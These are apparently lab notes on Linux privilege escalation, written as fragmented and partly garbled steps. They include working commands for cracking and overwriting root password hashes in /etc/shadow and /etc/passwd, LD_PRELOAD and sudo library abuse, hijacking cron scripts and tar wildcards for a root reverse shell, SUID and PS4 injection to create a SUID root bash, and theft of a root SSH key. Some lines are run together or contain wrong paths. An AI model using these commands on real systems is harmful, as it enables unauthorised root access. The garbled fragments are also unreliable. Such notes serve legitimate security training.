Login to [email protected] using password password321.
mysql was seen running in the server so used a classic mysql technique mentioned here
Since the file /etc/shadow could be read out by the user the hashed password of the root could be extracted which is this.
Cracked the hash using john.
ls -l /etc/shadow showed that the file could be written by the current user.
mkpasswd -m sha-512 <new-password> could be used to add the password and can be replaced with the root user password to get the privilege escalated.
/etc/passwd file is writable, if yes then the privilege escalation is easy.openssl passwd <new-password-here>/etc/passwd file and replace the x in the root:x:0:0:root:/root:/bin/bash to the hash output of the openssl.sudo -l to list the binaries which the user can run as root and use it to gain privileges.sudo -l for the environment variables that are inherited.gcc -fPIC -shared --nostartfiles -o /tmp/preload.so preload.c and run the file using a program that can be run as sudo making the LD_PRELOAD to be the object file as: sudo LD_PRELOAD=/tmp/preload.so vi.Another method:
LD_LIBRARY_PATH in the sudo -l, this method is applicable.ldd of the script/file.sudo LD_LIBRARY_PATH=<path-to-obj-file> <script/program>./etc/crontab lists the files which is updated regularly so requires root privileges.crontab can give a advantage and looking at the files listed in the crontab which also is writable can give a chance of privilege escalation.overwrite.sh script which is also listed in crontab and also writable.overwrite.sh to establish a reverse shell and got the root reverse shell.cat /etc/crontab to listout the system-wide crontab.Other component of /etc/crontab included /usr/local/bin/compress.sh
tar czf /tmp/backup.tar.gz *, since there was a wildcard * in the script operating with tar, It could be exploited.Having a look at GTFOBins, we found tar has a command line option that let us run other commands as part of a checkpoint feature.
--checkpoint and --checkpoint-action=exec=<rev-shell>filenames are valid tar commands tar will treat them as valid command line arguments.find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null to find all the SUID/SGID executables.find / -type f -perm /4000 2>/dev/null can also be used.strace to find the open/access calls for “no such file” errors using strace <path-to-SUID-exec-file> 2>&1 | grep -iE "open|access|no such files".This should make the file with SUID open the just created file with root privileges
And since it is a reverse shell\bash shell,
It should spawn a bash shell with root privilege.
function /usr/sbin/service { /bin/bash -p; } and export using export -f /bin/sbin/service.Basically what it does is use a variable in bash as the path to the file which points to our function.
Since the PATH in the SUID/SGID File points to a bash function, it is executed before actually reaching out to the actual file path.
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2
/tmp/rootbash -p to get the bash shell with root privileges.cat ~/.*history | less.ssh file and check if it is readable from the current user permissions.root_key which is the private key for the ssh file.chmod to change the file permissions of root_key to 600 = rw.ssh -i root_key root@<ip> to get into the server.File created via NFS inherit remote user’s ID, if the user is root, and root squashing is enabled, then ID will instead be set to the “nobody” user.
cat /etc/exports to find the pathmount -o rw,vers=2 10.10.10.10:/tmp /tmp/nfs after creating a /tmp/nfs directory.linux-exploit-suggester-2.pl tool to identify potential exploits on the system.